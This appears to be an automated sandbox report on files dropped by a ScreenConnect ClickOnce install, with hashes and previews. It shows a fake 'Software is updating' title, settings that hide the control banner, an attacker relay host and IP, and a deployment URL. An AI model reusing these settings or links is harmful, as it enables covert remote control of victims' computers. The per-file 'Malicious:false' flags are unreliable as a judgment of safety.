                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsbxMHwercD:rHy2DLI4MWoj12K9cAudMHcD
                                                                                                                                                                                                                                                  MD5:5A9944427C35328CB2D7E201CD705C32
                                                                                                                                                                                                                                                  SHA1:C58F7761A80CC65E12CC48AD459151DD7E02B2EA
                                                                                                                                                                                                                                                  SHA-256:333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
                                                                                                                                                                                                                                                  SHA-512:AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257
                                                                                                                                                                                                                                                  Entropy (8bit):4.896176001960815
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
                                                                                                                                                                                                                                                  MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                                                                                                                                                                                                                                  SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                                                                                                                                                                                                                                  SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                                                                                                                                                                                                                                  SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):50133
                                                                                                                                                                                                                                                  Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26722
                                                                                                                                                                                                                                                  Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1970
                                                                                                                                                                                                                                                  Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                                                  MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                                                  SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                                                  SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                                                  SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                  Entropy (8bit):5.036650973187548
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/ew/vXbAa3xT:2dL9hK6E46YPuvH
                                                                                                                                                                                                                                                  MD5:4E2841A7525E541608D9C989A050C2F5
                                                                                                                                                                                                                                                  SHA1:47D81D9E55B20DD0EDEE105874FF06CE3EB8C162
                                                                                                                                                                                                                                                  SHA-256:CB876304CFB6BBDC429A354523D987C5DC22FFE714D47D18D94040F240244ACD
                                                                                                                                                                                                                                                  SHA-512:8E62467BA1D47DFFFA590D1DA786A862C76D190D775C90C96550D883D498C56E6A0D5D889DD1D33BCD7970EF545DF1EA21103A8A1D6B712DF314763638D066FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2010%3a01%3a41</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                  Entropy (8bit):5.036650973187548
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/ew/vXbAa3xT:2dL9hK6E46YPuvH
                                                                                                                                                                                                                                                  MD5:4E2841A7525E541608D9C989A050C2F5
                                                                                                                                                                                                                                                  SHA1:47D81D9E55B20DD0EDEE105874FF06CE3EB8C162
                                                                                                                                                                                                                                                  SHA-256:CB876304CFB6BBDC429A354523D987C5DC22FFE714D47D18D94040F240244ACD
                                                                                                                                                                                                                                                  SHA-512:8E62467BA1D47DFFFA590D1DA786A862C76D190D775C90C96550D883D498C56E6A0D5D889DD1D33BCD7970EF545DF1EA21103A8A1D6B712DF314763638D066FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2010%3a01%3a41</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1373
                                                                                                                                                                                                                                                  Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                  MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                  SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                  SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                  SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):1662
                                                                                                                                                                                                                                                  Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                  MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                  SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                  SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                  SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):847
                                                                                                                                                                                                                                                  Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (625), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15036
                                                                                                                                                                                                                                                  Entropy (8bit):3.8088109369435084
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:84JqHzST41Ua+4JqHzSg714JqHzSjoII+43LEv:8FqKUtFR71F4oIRAA
                                                                                                                                                                                                                                                  MD5:7A9B9539BEF3F9AC1B7D821B2E2B5BB1
                                                                                                                                                                                                                                                  SHA1:DBF738FED3A374EC4D829A9962B034B785DAF19F
                                                                                                                                                                                                                                                  SHA-256:0814809D9E213F14DD0B5F0B2C208D2C1627475D3DECE91E9C69B2F1B3DB64F2
                                                                                                                                                                                                                                                  SHA-512:6A47177542635BA23C0B5E99D2D7FD02252817A23DD15E3645782FB0D554D688F0E4C9066626956E0AD575E3AB5BE68CFC28422E0352C31F477AC33D7FCC66A5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.v.o.i.c.e.m.a.i.l.-.l.a.k.e.l.e.f.t...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.p.o.p.w.e.e.2...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.4.b.4.3.e.6.5.1.-.6.d.2.1.-.4.8.a.4.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
